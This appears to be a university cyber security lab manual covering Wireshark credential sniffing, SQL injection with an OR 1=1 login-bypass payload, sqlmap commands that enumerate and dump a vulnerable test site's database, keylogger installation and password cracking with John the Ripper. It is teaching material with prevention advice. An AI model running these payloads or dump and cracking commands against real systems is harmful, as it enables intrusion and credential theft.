1. Download Wireshark from https://www.wireshark.org/download.html

2. Once downloaded, open the exe file.

Figure 1. Welcome screen

Figure 2. License agreement



Figure 3. Select the components to install.



Figure 4. Configure additional tasks to be performed after the installation ends.

Figure 5. Select Installation location.



Figure 6. Install the latest version of Nmap if your Nmap version is lower.

Figure 7. Select if you want to capture USB traffic



Figure 8. Installation process starts.

Figure 9. Installation process finished.

3. Click on the Wireshark icon to start it after successful installation.

Fig: Wireshark home screen with the various interfaces


Capturing data packets on Wireshark


When you open Wireshark, you see a screen showing a list of all the network connections you can
monitor. You also have a capture filter field to capture only the network traffic you want to see.
You can select one or more of the network interfaces using Shift+left-click. Once you have selected the
network interface, you can start the capture, and there are several ways to do that.
Click the first button on the toolbar, titled "Start capturing packets."

You can select the menu item Capture -> Start.



Or you could use the keystroke Control+E.


During the capture, Wireshark will show you the packets captured in real-time.

Once you have captured all the packets needed, use the same buttons or menu options to stop the capture
as you did to begin.
Best practice dictates stopping Wireshark’s packet capture before analysis.

Analyzing data packets on Wireshark

Wireshark shows you three different panes for inspecting packet data. The Packet List, the top pane, lists
all the packets in the capture. When you click on a packet, the other two panes change to show you the
details about the selected packet. You can also tell if the packet is part of a conversation. Here are details
about each column in the top pane:
• No.: This is the number order of the packet captured. The bracket indicates that this packet is
part of a conversation.
• Time: This column shows how long after you started the capture this packet was captured. You
can change this value in the Settings menu to display a different option.
• Source: This is the address of the system that sent the packet.
• Destination: This is the address of the packet destination.
• Protocol: This is the type of packet. For example: TCP, DNS, DHCPv6, or ARP.
• Length: This column shows you the packet’s length, measured in bytes.
• Info: This column shows you more information about the packet contents, which will vary
depending on the type of packet.
Packet Details, the middle pane, shows you as much readable information about the packet as possible,
depending on the packet type. You can right-click and create filters based on the highlighted text in this
field.
The bottom pane, Packet Bytes, displays the packet exactly as it was captured in hexadecimal.
When looking at a packet that is part of a conversation, you can right-click the packet and select Follow
to see only the packets that are part of that conversation.

Wireshark filters

Some of the best features of Wireshark are the capture filters and display filters. Filters allow you to view
the capture the way you need to see it to troubleshoot the issues at hand. Below are several filters to get
you started.

Examples of filters

1. Filter syntax: ip.addr == [IP ADDRESS]


Ex. ip.addr == 192.168.1.1
This filter will display all network traffic that has the IP address "192.168.1.1" either as the
source or destination address.

2. Filter syntax: ip.src == [IP ADDRESS]


Ex. ip.src == 192.168.1.1
This filter will display all network traffic that has the IP address "192.168.1.1" as the source

address.

3. Filter syntax: ip.dst == [IP ADDRESS]


Ex. ip.dst == 192.168.1.1
This filter will display all network traffic that has the IP address "192.168.1.1" as
the destination address.

4. Filter syntax: tcp.port == [port] or udp.port == [port]


Ex. tcp.port == 443 or udp.port == 1455
This filter will display all network traffic that uses either TCP port 443 or UDP port 1455.

5. Filter syntax: eth.addr == [Ethernet address]


Ex. eth.addr == 00:11:22:33:44:55
This filter command will display network traffic that has a source or destination
MAC address of "00:11:22:33:44:55".
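To make the packet format and the display filters above concrete, here is an added example (not from the manual) that decodes the raw bytes Wireshark shows in its Packet Bytes pane into the Packet List columns, and then evaluates the manual's five filter expressions over those decoded packets. The sample frames are constructed in code, not taken from a real capture, and the filter evaluator supports only `field == value` terms joined by `and` / `or`.

```python
import struct
from dataclasses import dataclass
from typing import Optional


@dataclass
class Packet:
    """The columns Wireshark shows in its Packet List pane, for one frame."""
    eth_src: str
    eth_dst: str
    ip_src: Optional[str]
    ip_dst: Optional[str]
    protocol: str
    src_port: Optional[int]
    dst_port: Optional[int]
    length: int          # frame length in bytes, as in the Length column


PROTO_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}


def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ipv4(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_frame(frame: bytes) -> Packet:
    """Decode Ethernet II -> IPv4 -> TCP/UDP headers from raw frame bytes."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    eth_dst, eth_src, eth_type = struct.unpack("!6s6sH", frame[:14])   # dst(6) src(6) type(2)
    if eth_type != 0x0800:                                               # not IPv4: stop at layer 2
        return Packet(mac(eth_src), mac(eth_dst), None, None, f"0x{eth_type:04x}", None, None, len(frame))
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                                             # IPv4 header length in bytes
    if len(ip) < 20 or ihl < 20:
        raise ValueError("truncated IPv4 header")
    proto, src, dst = ip[9], ipv4(ip[12:16]), ipv4(ip[16:20])
    payload = ip[ihl:]
    sport = dport = None
    if proto in (6, 17) and len(payload) >= 4:                           # TCP and UDP both begin with the two ports
        sport, dport = struct.unpack("!HH", payload[:4])
    return Packet(mac(eth_src), mac(eth_dst), src, dst, PROTO_NAMES.get(proto, str(proto)), sport, dport, len(frame))


# The manual's display-filter fields, each mapped to the set of values it can match on a packet.
FIELD_VALUES = {
    "ip.addr": lambda p: {p.ip_src, p.ip_dst} - {None},
    "ip.src": lambda p: {p.ip_src} - {None},
    "ip.dst": lambda p: {p.ip_dst} - {None},
    "eth.addr": lambda p: {p.eth_src, p.eth_dst},
    "tcp.port": lambda p: {p.src_port, p.dst_port} if p.protocol == "TCP" else set(),
    "udp.port": lambda p: {p.src_port, p.dst_port} if p.protocol == "UDP" else set(),
}


def matches(expr: str, p: Packet) -> bool:
    """Evaluate '<field> == <value>' terms joined by 'and' / 'or' (no parentheses).
    As in Wireshark, 'and' binds tighter than 'or'."""
    def atom(text: str) -> bool:
        field, op, value = text.split()
        if op != "==" or field not in FIELD_VALUES:
            raise ValueError(f"unsupported filter term: {text!r}")
        wanted = int(value) if field.endswith(".port") else value.lower()
        return wanted in FIELD_VALUES[field](p)
    return any(all(atom(a) for a in term.split(" and ")) for term in expr.split(" or "))


def build_frame(src_ip: str, dst_ip: str, proto: int, sport: int, dport: int) -> bytes:
    """Constructed sample frame (not a real capture); IP/TCP checksums are left at zero."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("aabbccddeeff") + b"\x08\x00"
    if proto == 6:   # minimal TCP SYN header: ports, seq, ack, offset, flags, window, csum, urg
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x02, 65535, 0, 0)
    else:            # UDP header: ports, length, checksum
        l4 = struct.pack("!HHHH", sport, dport, 8, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 1, 0x4000, 64, proto, 0,
                     bytes(int(x) for x in src_ip.split(".")), bytes(int(x) for x in dst_ip.split(".")))
    return eth + ip + l4


def sample_packets() -> list:
    frames = [build_frame("192.168.1.1", "10.0.0.5", 6, 51000, 443),   # TCP to port 443
              build_frame("10.0.0.5", "192.168.1.1", 17, 1455, 53),    # UDP from port 1455
              build_frame("10.0.0.7", "10.0.0.8", 6, 40000, 80)]       # unrelated TCP flow
    return [parse_frame(f) for f in frames]


if __name__ == "__main__":
    for expr in ("ip.addr == 192.168.1.1", "tcp.port == 443 or udp.port == 1455"):
        print(expr, [matches(expr, p) for p in sample_packets()])
```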

Using the Wireshark tool, capture the data passed to a vulnerable website. Here we are
capturing the data of http://testphp.vulnweb.com/login.php.
First, enter a user name and password, then click the login button.

Now, in the Wireshark tool, find GET /login.php HTTP/1.1

Fig: Wireshark capture of the login request

Then right-click on Hypertext Transfer Protocol and, from the dropdown, go to Follow and then HTTP Stream.

Here we can see what we have passed into the login form.

Capture Images using Wireshark

We can also capture images.

Start Wireshark capturing and then open an image on the same website used above, or click the link below:
http://testphp.vulnweb.com/listproducts.php?cat=1

Then click on any one of the images. Now stop capturing and click on File -> Export Objects -> HTTP Objects; you will see a number of objects as below.

Click on the Preview button to see the captured image; here is the output image.

References:

Conclusion:

This experiment successfully explored the Wireshark tool for network traffic analysis. We
learned how to capture and analyze network packets, identify common protocols and their functions,
and understand the packet format. By troubleshooting Wireshark-related issues and applying best practices,
we gained valuable skills in network traffic analysis and problem-solving.
Rubrics:

Criteria 1 2 3 Total
Marks

Faculty Signature
Experiment No: 06
Examine SQL injection attack. Perform SQL injection with SQLMap on
vulnerable websites.

Date:

Competency and Practical Skills:

Relevant CO:

Objectives:
• To understand the concept and mechanism of SQL injection attack and its impact on web
security.
• To learn how to use SQLMap, a popular tool for automating SQL injection detection and
exploitation.
• To practice SQL injection techniques on vulnerable websites and analyze the results.
• To develop skills and awareness for preventing and mitigating SQL injection attacks in
web development.

What is SQL Injection

SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of
the statement or to append a condition that will always be true. It takes advantage of design
flaws in poorly designed web applications to exploit SQL statements and execute malicious SQL
code.
Let's consider a simple web application with a login form. The code for the HTML form is shown
below.
Suppose the user supplies admin@admin.sys and 1234 as the password. The statement to be
executed against the database would be
SELECT * FROM users WHERE email = 'admin@admin.sys' AND password = md5('1234');
The above code can be exploited by commenting out the password part and appending a condition
that will always be true. Let's suppose an attacker provides the following input in the email address
field:
xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ']
and xxx for the password.
The generated dynamic statement will be as follows:
SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND
password = md5('1234');
Here,
• xxx@xxx.xxx ends with a single quote, which closes the string literal.
• OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to
only one record.
• -- ' AND ... is a SQL comment that eliminates the password part.

Other SQL Injection attack types:


SQL Injections can do more harm than just bypassing the login logic. Some of the attacks
include:

• Deleting data
• Updating data
• Inserting data
• Executing commands on the server that can download and install malicious programs such
as Trojans.
• Exporting valuable data such as credit card details, email, and passwords to the attacker's
remote server
• Getting user login details, etc.
The above list is not exhaustive; it just gives you an idea of what SQL Injection
How to Prevent SQL Injection Attacks
An organization can adopt the following policy to protect itself against SQL Injection attacks.
• User input should never be trusted – it must always be sanitized before it is used in
dynamic SQL statements.
• Stored procedures – these can encapsulate the SQL statements and treat all input as
parameters.
• Prepared statements – these work by creating the SQL statement first and then
treating all submitted user data as parameters. The user data therefore has no effect on the syntax of the SQL
statement.
• Regular expressions – these can be used to detect potentially harmful code and remove it
before executing the SQL statements.
• Database connection user access rights – only the necessary access rights should be given to
accounts used to connect to the database. This limits what the SQL statements can
perform on the server.
• Error messages – these should not reveal sensitive information or where exactly an error
occurred. Simple custom error messages such as "Sorry, we are experiencing technical
errors. The technical team has been contacted. Please try again later" can be used instead of
displaying the SQL statements that caused the error.
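The login query from the explanation above, in its dynamic-SQL form beside the prepared-statement form the prevention list recommends, as an added example (not the manual's code). The users table is an in-memory SQLite database constructed in the block; MD5 is used only to mirror the manual's query, and the injection string is the one the manual gives.

```python
import hashlib
import sqlite3
from typing import Optional

# The manual's injection input: closes the string, appends an always-true condition, comments out the rest.
PAYLOAD_EMAIL = "xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ']"
PAYLOAD_PASSWORD = "xxx"


def md5(text: str) -> str:
    # Mirrors the md5() call in the manual's query. A real application needs a slow, salted
    # password hash (bcrypt/scrypt/argon2); MD5 is kept here only to match the example.
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with the one account from the manual's example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin@admin.sys", md5("1234")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    """Dynamic SQL: the user's input is pasted into the statement text, exactly the pattern
    the manual describes, so quotes, OR and -- in the email change the statement's meaning."""
    sql = f"SELECT email FROM users WHERE email = '{email}' AND password = '{md5(password)}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    """Prepared statement: the SQL text is fixed first, then the inputs are bound as parameters.
    The database engine never parses the inputs as SQL, so the payload is just an unknown email."""
    sql = "SELECT email FROM users WHERE email = ? AND password = ?"
    row = conn.execute(sql, (email, md5(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:", login_vulnerable(db, PAYLOAD_EMAIL, PAYLOAD_PASSWORD))  # logged in as admin
    print("safe, payload:     ", login_safe(db, PAYLOAD_EMAIL, PAYLOAD_PASSWORD))        # None
```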

Evaluate SQL Injection


1) SQL Injection on the Codingame website: https://www.codingame.com/playgrounds/154/sql-injection-demo/sql-injection
2) SQL Injection on the Hacksplaining website: https://www.hacksplaining.com/exercises/sql-injection

How to Install SQLMap

SQLMap comes pre-installed with Kali Linux, which is the preferred choice of most penetration
testers. However, you can install sqlmap on other Debian-based Linux systems using the command:

sudo apt-get install sqlmap

How to use SQLmap?

Use the following URL to test SQLMap:

http://testphp.vulnweb.com/listproducts.php?cat=1

Do not use this tool on any other website.

Run following Commands:

Command 1: sqlmap -h

Command 2: List information about the existing databases
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
We want to test whether it is possible to gain access to a database, so we use the --dbs
option. --dbs lists all the available databases.

Command 3: List information about the tables present in a particular database
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Command 4: List information about the columns of a particular table
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns

Command 5: Dump the data from the columns
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

References:

https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/

Conclusion:

This experiment successfully examined SQL injection attacks and their impact on web security. We
learned how to use SQLMap to automate SQL injection detection and exploitation, and practiced these
techniques on vulnerable websites. By understanding the mechanisms of SQL injection and developing
prevention strategies, we gained valuable skills for securing web applications against this common vulnerability
Rubrics:

Criteria 1 2 3 4 5 Total
Marks

Faculty Signature
Experiment No: 07
Examine software keyloggers and hardware keyloggers.
Date:

Relevant CO:

Objectives:
• To understand the concept and types of keyloggers and how they can be used to capture
keystrokes and other sensitive information.
• To learn how to identify and analyze software keyloggers and hardware keyloggers on a
system.
• To practice using various tools and techniques to detect and remove keyloggers from a
system.
• To develop skills and awareness for preventing and mitigating keylogger attacks in
computer security.

KeyLogger:
o Keystroke logging, often referred to as keylogging or keyboard capturing, is the
action of recording (logging) the keys struck on a keyboard, typically covertly, so
that the person using the keyboard is unaware that their actions are being monitored.
The data can then be retrieved by the person operating the logging program. A keystroke
recorder or keylogger can be either software or hardware.
o While the programs themselves are legal, with many designed to allow employers to
oversee the use of their computers, keyloggers are most often used for stealing passwords
and other confidential information.
o Keylogging can also be used to study keystroke dynamics or human-computer
interaction. Numerous keylogging methods exist, ranging from hardware- and
software-based approaches to acoustic cryptanalysis.

• Types Of KeyLogger:
There are two types of KeyLogger:
1. Software Based KeyLogger: Software keyloggers are applications that must be installed
on the computer to work. This is the most common type of keyloggers that hackers
spread on the Internet. Software keyloggers install on the computer when the user
downloads an infected application. Once installed, it monitors the paths of the operating
system that the keys you press on the keyboard must go through. That’s how software
keyloggers track and record keystrokes. Then it transmits the information to the hacker
via a remote server.
2. Hardware Based KeyLogger: Hardware keyloggers work the same way as software
keyloggers. The only difference is that a hardware keylogger must be physically attached to the
victim's computer to record keystrokes. To retrieve the information, the hacker needs
to download it from the storage device. Retrieving data while the hardware keylogger is
at work is not possible; the workaround is to make the device accessible via Wi-Fi to
obtain the data. Some examples of hardware keyloggers are the acoustic keylogger and the
keyboard keylogger.
Install and Use one of the following Keyloggers:
1. Kidlogger - https://kidlogger.net/
2. Refog Personal Monitor - https://refog.com/pc-monitoring-software.html
3. All In One Keylogger - https://www.relytec.com/
4. You can use any other keylogger; the above are a few examples.

How to Detect, Prevent and Mitigate Keyloggers?

To detect, prevent, and mitigate keyloggers using the Refog Personal Monitor tool, follow these steps:

1. Detecting Keyloggers

• Install Refog Personal Monitor: Download and install the Refog Personal Monitor tool on your
system.

• Run a system scan: Once installed, use the tool to scan your computer. Refog monitors
all activities, including keystrokes, making it easier to detect any keyloggers installed on
the system.

• Review keystroke logs: The tool logs keystrokes from all running applications. Analyze
these logs to detect any suspicious or unknown programs capturing keystrokes.
• Check suspicious activity: Refog also captures information like screenshots and visited websites,
helping you identify if any suspicious programs or actions are related to a keylogger.

2. Preventing Keyloggers

• Monitor running applications: Refog monitors all active applications and can alert you of any
unfamiliar or suspicious processes running on the system, allowing you to terminate them before
they cause harm.
• Update software regularly: Keep Refog and your operating system updated to prevent new
keylogger variants from bypassing security measures.

• Use alerts and notifications: Set up alerts in Refog for unusual activity, such as new software
installations or suspicious keystroke logs.

3. Mitigating Keylogger Threats

• Terminate malicious processes: If Refog detects a keylogger, you can use task manager or
security tools to immediately terminate the malicious process.

• Uninstall suspicious programs: Identify any software associated with the keylogger and
uninstall it. Refog’s monitoring helps you detect which applications are logging keystrokes or
performing unauthorized actions.

• Use anti-malware tools: While Refog Personal Monitor helps in detection, complement it
with a strong anti-malware tool for complete protection against keyloggers.

• Regularly review logs: Continuously monitor keystroke logs and screenshots to catch any future
keylogging attempts early on.

By combining Refog's monitoring capabilities with a vigilant approach, you can effectively detect, prevent, and mitigate keylogger threats.
References:

• https://www.refog.com/
• https://www.keylogger.org/monitoring-software-review/refog-personal-monitor.html
• https://impulsec.com/parental-control-software/refog-keylogger-review/
• https://www.youtube.com/watch?v=4sxzuqisVSg

Conclusion:

This experiment successfully explored the concept of keyloggers and their use in capturing keystrokes
and sensitive information. We learned about the different types of keyloggers (software and hardware)
and their methods of operation. By practicing identification, analysis, and removal techniques, we
gained valuable skills in detecting and mitigating keylogger attacks, enhancing computer security.
Rubrics:

Criteria 1 2 3 4 5 6 Total
Marks

Faculty Signature
Experiment No: 08
Perform password cracking using John the Ripper (JtR).
Date:

Relevant CO:

Objectives:
• Identify the type and format of the password hashes to be cracked.
• Install and configure John the Ripper on a suitable system.
• Use various modes and options of John the Ripper to crack the password hashes.
• Analyze and report the results of the password cracking process.
• Evaluate the strength and security of the passwords and suggest improvements.

John the Ripper

John the Ripper (JtR) is a popular password-cracking tool. John supports many encryption
technologies for Windows and Unix systems (Mac included).
One remarkable feature of John is that it can autodetect the encryption for common formats. This
will save you a lot of time in researching the hash formats and finding the correct tool to crack them.
John is also a dictionary-based tool. This means that it works with a dictionary of common
passwords to compare it with the hash in hand. Here is a common password list called rockyou.txt
(https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz).

This is how John works by default:


• recognize the hash type of the current hash.
• generate hashes on the fly for all the passwords in the dictionary.
• stop when a generated hash matches the current hash.
This is not the only way John finds a password. You can also customize John based on your
requirements. For example, you can specify the hash format using the --format flag.

How to Install John the Ripper

sudo apt install john

How to Use John the Ripper


Now that we know what John is, let's look at the three modes it offers. You will be using one
of these three for most of your use cases.
• Single crack mode
• Wordlist mode (Dictionary Mode)
• Incremental mode

Dictionary Mode:
In dictionary mode, we will provide John with a list of passwords. John will generate hashes for
these on the fly and compare them with our password hash.

For this example, we will use the RockYou wordlist. If you are using Kali, you can find it at
/usr/share/wordlists/rockyou.txt. We will also have a crack.txt file with just the password hash.

edba955d0ea15fdef4f61726ef97e5af507430c0

Here is the command to run John in dictionary mode using the wordlist.

$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 crack.txt


And John finds the password quickly.

The weaker the password is, the quicker John can figure it out. This is why it is always
recommended to have strong passwords.
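An added example (not from the manual or from John the Ripper) that reproduces John's default loop from the description above: guess the hash format from its length, hash every dictionary word on the fly, and stop at the first match. It is written as an audit of a stored raw-SHA1 hash against a breached-password list; the short wordlist is constructed in the block and stands in for rockyou.txt, and the target hash is computed from a constructed password rather than taken from crack.txt.

```python
import hashlib
from typing import Iterable, Optional, Tuple


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def guess_format(hash_hex: str) -> Optional[str]:
    """Crude stand-in for John's autodetection: unsalted hex digests are told apart by length alone.
    John uses more than length (salt markers, prefixes such as $6$), so this is only a heuristic."""
    h = hash_hex.strip().lower()
    if not all(c in "0123456789abcdef" for c in h):
        return None
    return {32: "raw-md5", 40: "raw-sha1", 64: "raw-sha256"}.get(len(h))


def dictionary_audit(target_hash: str, wordlist: Iterable[str],
                     fmt: str = "raw-sha1") -> Optional[Tuple[str, int]]:
    """John's wordlist mode in miniature: hash each candidate and compare against the target.
    Returns (password, number_of_candidates_tried) on a hit, or None if the list is exhausted.
    A weak password sits early in a popularity-ordered list, so it falls after few attempts."""
    if fmt != "raw-sha1":
        raise ValueError("only raw-sha1 is implemented in this example")
    target = target_hash.strip().lower()
    for tried, candidate in enumerate(wordlist, start=1):
        candidate = candidate.rstrip("\r\n")        # wordlist files carry one word per line
        if sha1_hex(candidate) == target:
            return candidate, tried
    return None


# Constructed wordlist standing in for rockyou.txt (which holds about 14 million entries).
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "iloveyou", "alexander", "letmein"]


if __name__ == "__main__":
    weak = sha1_hex("iloveyou")                      # constructed target, not the manual's crack.txt hash
    print(guess_format(weak), dictionary_audit(weak, SAMPLE_WORDLIST))
    strong = sha1_hex("correct-horse-battery-staple-2024")
    print(dictionary_audit(strong, SAMPLE_WORDLIST))   # None: not in the list
```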

For more information visit: https://www.freecodecamp.org/news/crack-passwords-using-john-the-


ripper-pentesting-tutorial/
Cyber Security (3150714)

What are the best practices for Secure Password?


Some best practices for ensuring secure passwords:
1. Use Long Passwords: A secure password should be at least 12–16 characters long, with
more being preferable.
2. Include a Mix of Characters: Combine uppercase letters, lowercase letters, numbers, and
special characters (e.g., @, #, $, !).
3. Avoid Predictable Patterns: Avoid using easily guessed information like your name,
birth date, or common words. Passwords should not include keyboard patterns (e.g., "123456",
"qwerty").
4. Use a Password Manager: A password manager can generate and store complex passwords
for you, making it easier to maintain secure, unique passwords for different accounts.
5. Enable Two-Factor Authentication (2FA): Use 2FA wherever possible. This adds an extra
layer of security beyond just the password.
6. Avoid Reusing Passwords: Each account should have a unique password to minimize risk in
case of a breach.
7. Regularly Update Passwords: Change passwords periodically, especially after security breaches.
8. Don't Share Passwords: Never share passwords over email, chat, or other insecure methods. If
sharing is necessary, use secure means like a password manager's sharing feature.

By following these practices, you can significantly improve password security and reduce the
chances of unauthorized access.
References:

• https://www.freecodecamp.org/news/crack-passwords-using-john-the-ripper-pentesting-tutorial/
• https://www.geeksforgeeks.org/how-to-install-john-the-ripper-on-windows/
• https://www.openwall.com/john/

Conclusion:

This experiment successfully explored the password cracking tool John the Ripper
(JtR). We learned how to identify hash types, install and configure JtR, and use
different cracking modes (single, dictionary, incremental). By cracking password
hashes and analyzing the results, we gained insights into password strength and
security vulnerabilities. This knowledge is crucial for implementing robust
password policies and protecting against unauthorized access.
Rubrics:

Criteria 1 2 3 4 5 6 Total
Marks

Faculty Signature
Experiment No: 09
Consider a case study of cybercrime, where the attacker has performed Cyber
Crime. Prepare a report and list the laws that will be implemented on
attackers.
Date:

Relevant CO:

Objectives:
• Identify the type and motive of the cybercrime and the attacker involved in the case study.
• Analyze the impact and damage caused by cybercrime on the victim and society.
• Research and cite the relevant laws and provisions that apply to the cybercrime and the
attacker in India.
• Prepare a report that summarizes the case study, the analysis, and the legal implications of
cybercrime.
• Recommend preventive measures and best practices to avoid or mitigate such cybercrimes
in the future.

Consider any one of the cybercrimes for the case study and prepare report on it:

FOLLOWING ARE SOME OF THE EXAMPLE OF CASE STUDIES. YOU CAN SELECT
ANY OTHER CASE STUDY AS WELL AND PREPARE A REPORT ON IT.

• The Colonial Pipeline ransomware attack in May 2021, which disrupted the fuel supply
in the US and prompted the government to declare an emergency. The attack was carried
out by the DarkSide ransomware gang, which later went into hiding and faced law
enforcement action.
• The Kaseya ransomware heist in July 2021, which affected over 1,000 businesses whose
IT systems were locked after the REvil ransomware gang compromised the services
provider Kaseya. The gang demanded a cumulative $70m ransom payment and later
disappeared from the internet.
• The Irish Health Service Executive ransomware attack in May 2021, which encrypted
the systems of the healthcare provider and disrupted its services amid the Covid-19
pandemic. The attack was carried out by the Conti ransomware gang, which later released a
decryption tool after facing public backlash.
• The Shreya Singhal v. UOI case in 2015, which challenged the constitutionality of Section
66A of the Information Technology Act, 2000, which criminalized sending
offensive or annoying messages online. The Supreme Court struck down the section as
violative of the freedom of speech and expression.
• The $10 million hack case in 1994, which was one of the first cybercrimes to be prosecuted
in the US. A Russian hacker named Vladimir Levin accessed the accounts of
Citibank customers and transferred millions of dollars to his accomplices’ accounts. He was
later arrested and extradited to the US.
• The Nasscom v. Ajay Sood case in 2005, which was one of the first cases of data theft
and cyber espionage in India. The accused hacked into the database of Nasscom, a trade
association of IT companies, and stole confidential information. He was convicted under
various sections of the IT Act and the Indian Penal Code.
• The Speak Asia Online case in 2011, which was one of the largest online frauds in India.
The company lured millions of people to invest in its online surveys and promised high
returns. However, it turned out to be a Ponzi scheme and duped investors of over Rs 2,000
crore. The case is still under investigation by various agencies.
• The social media and darknet management by Manipur Police case in 2020, which
showcased how the police used cyber forensics and intelligence to track down and arrest
drug traffickers who were using social media platforms and darknet markets to operate
their illegal business. The case also highlighted the challenges and opportunities for law
enforcement agencies in dealing with cybercrime.

Report: Case Study of Cybercrime - E-Mail Spoofing Instances

Introduction:

Email spoofing is a growing concern in India, and several instances have been reported in
recent years. In this case study, we will examine some email spoofing instances in India and the
legal implications for the attackers.

About the Fraud:

Instance 1: Bank Fraud

In 2020, a Hyderabad-based man was arrested for allegedly spoofing email addresses of
the Reserve Bank of India (RBI) and several other banks. The attacker sent fraudulent emails to
customers, asking them to update their bank account details, including their ATM PIN and CVV.
The attacker used the information to withdraw money from the victim's accounts. The man was
charged with cheating, forgery, and using a fake identity mark.

Instance 2: Job Offer Scam

In 2019, a man was arrested in Mumbai for sending fake job offer letters to people. The
attacker used spoofed email addresses of well-known companies to send job offers to the
victims. The man charged money from the victims for job placements and disappeared with the
money. He was charged with cheating, forgery, and criminal breach of trust.

Laws applicable to the attacker:

Email spoofing is a punishable offense in India under the following laws:

The Indian Penal Code (IPC): The IPC includes provisions related to cheating, forgery,
and using a fake identity mark. The attackers in the above instances could be charged with
violating the IPC if they used spoofed email addresses to cheat or deceive the victims.

The Information Technology Act, 2000: The IT Act includes provisions related to
unauthorized access to computer systems, data theft, and cyberstalking. The
attackers could be charged with violating the IT Act if they gained unauthorized access to the
victim's computer systems to carry out the email spoofing.

The Payment and Settlement Systems Act, 2007: This Act regulates payment systems in
India. The attackers could be charged with violating the
Act if they used the victim's financial information for fraudulent activities.

Conclusion:

Email spoofing is a serious crime that can lead to severe legal consequences for the
attackers. It is essential to take preventive measures such as email authentication protocols,
employee training, and advanced security software to prevent email spoofing. Moreover, strict
legal action against the attackers will deter them and others from engaging in such criminal
activities. Indian laws related to cybercrime are stringent, and attackers can face severe legal
penalties for committing email spoofing or any other cybercrime.
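The "email authentication protocols" named above are SPF, DKIM and DMARC; the following added example (not part of the lab manual) shows the DMARC alignment test that would have flagged the spoofed bank mail in Instance 1: the From: domain the victim sees must belong to the same organisation as a domain that actually passed SPF or DKIM. Both messages and all domains are constructed samples, and the organisational-domain helper is a simplification that ignores the public-suffix list.

```python
"""Relaxed DMARC alignment check: does the From: domain a recipient sees match
a domain that actually passed SPF or DKIM? Added example, not lab-manual code."""
import email
import re
from email.utils import parseaddr

# Constructed sample: From: claims a bank domain, but the receiving MTA's
# Authentication-Results show SPF/DKIM passing only for an unrelated domain.
SPOOFED_MSG = """\
From: "RBI Alerts" <alerts@rbi.example>
To: customer@example.net
Subject: Update your account details
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=bulk.attacker.example;
 dkim=pass header.d=attacker.example
"""

# Constructed sample: SPF passes for a subdomain of the same organisation.
LEGIT_MSG = """\
From: "Bank Support" <support@mail.bank.example>
To: customer@example.net
Subject: Your statement is ready
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=mail.bank.example;
 dkim=pass header.d=bank.example
"""

def org_domain(domain):
    """Simplified organisational domain: last two labels (no public-suffix list)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])

def auth_results(msg):
    """Map 'spf'/'dkim' to (result, identifier domain) from Authentication-Results."""
    header = msg.get("Authentication-Results", "")
    found = {}
    for method, key in (("spf", "smtp.mailfrom"), ("dkim", "header.d")):
        m = re.search(rf"{method}=(\w+)[^;]*?{re.escape(key)}=([\w.-]+)", header)
        if m:
            found[method] = (m.group(1).lower(), m.group(2).lower())
    return found

def dmarc_alignment(raw):
    """Return (aligned, from_domain, results); aligned only if a passing SPF or
    DKIM identifier shares the From: organisational domain."""
    msg = email.message_from_string(raw)
    from_dom = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    results = auth_results(msg)
    aligned = any(res == "pass" and org_domain(dom) == org_domain(from_dom)
                  for res, dom in results.values())
    return aligned, from_dom, results
```

A real receiver would additionally look up the From: domain's DMARC record to decide whether an unaligned message is quarantined or rejected; this block only performs the alignment decision.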
Rubrics:

Criteria 1 2 3 4 5 Total Marks

Faculty Signature
